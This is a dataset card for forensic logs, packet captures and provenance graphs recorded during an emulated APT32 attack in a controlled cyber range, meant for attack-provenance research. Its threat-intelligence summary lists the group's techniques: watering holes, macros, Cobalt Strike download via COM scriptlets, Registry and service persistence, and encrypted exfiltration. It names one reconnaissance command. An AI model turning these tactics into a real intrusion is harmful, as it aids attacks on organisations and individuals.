This dataset captures detailed forensic evidence and system behavior generated from a simulated APT32 cyberattack scenario. The attack emulation was based on multiple Cyber Threat Intelligence (CTI) reports describing real-world tactics and techniques attributed to the APT32 threat actor group. The goal is to provide a comprehensive view of host and network-level activities during a full attack chain in a controlled cyber range.
Contents
1. Provenance Graphs
.dot files representing system-level events and causal dependencies.- Two variants:
*-provenance-graph.dot: Linux-based systems.*-sysmon-provenance-graph.dot: Windows-based systems.
2. System Logs
Linux Hosts
- audit.log from /var/log/audit/
- sysdig.scap (zipped in /var/log/sysdig.zip) from Sysdig monitoring
Windows Hosts
- Microsoft-Windows-Sysmon_Operational.evtx from Sysmon logs
3. Attack Annotation
annotation-attack.csv: Semicolon-delimited file that maps events to attack steps.- Includes fields such as timestamp, system, executable, and high-level activity label.
4. Network Capture
.pcap files capturing network traffic from both Linux (tcpdump) and Windows (Pktmon).
5. Memory Dumps
- Raw memory images (
*.elf) collected during the simulation are available upon request for in-depth analysis.
Cyber Threat Intelligence (CTI) Description
APT32 is a suspected Vietnam-based threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims. APT32 enumerated administrative users using the commands net localgroup administrators. APT32 has set up and operated websites to gather information and deliver malware. APT32 has set up Dropbox, Amazon S3, and Google Drive to host malicious downloads. APT32 has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP. APT32 has used email for C2 via an Office macro. APT32's backdoor has used LZMA compression and RC4 encryption before exfiltration. APT32 established persistence using Registry Run keys, both to execute PowerShell and VBS scripts as well as to execute their backdoor directly. APT32 has used COM scriptlets to download Cobalt Strike beacons. APT32 has used PowerShell-based tools, PowerShell one-liners, and shellcode loaders for execution. APT32 has used cmd.exe for execution. APT32 has used macros, COM scriptlets, and VBS scripts. APT32 has used JavaScript for drive-by downloads and C2 communications. APT32 modified Windows Services to ensure PowerShell scripts were loaded on the system. APT32 also creates a Windows service to establish persistence. APT32 has infected victims by tricking them into visiting compromised watering hole websites. APT32 has set up Facebook pages in tandem with fake websites.
CTI Report: link
License
This dataset is licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) license.
You are free to share, modify, and build upon the data for any purpose, including commercial use, as long as proper credit is given to the original authors.
Citation
If you use this dataset in your work, please cite the following publication:
bibtex
@inproceedings{provcon25,
title = {From {Observations} to {Insights}: {Constructing} {Effective} {Cyberattack} {Provenance} {With} {PROVCON}},
language = {en},
booktitle = {Workshop on {SOC} {Operations} and {Construction} ({WOSOC}) 2025},
author = {Yusof, Anis and Li, Shaofei and Kawatra, Arshdeep Singh and
Li, Ding and Chang, Ee-Chien and Liang, Zhenkai},
year = {2025},
isbn = {9798991927604},
doi = {https://dx.doi.org/10.14722/wosoc.2025.23008},
}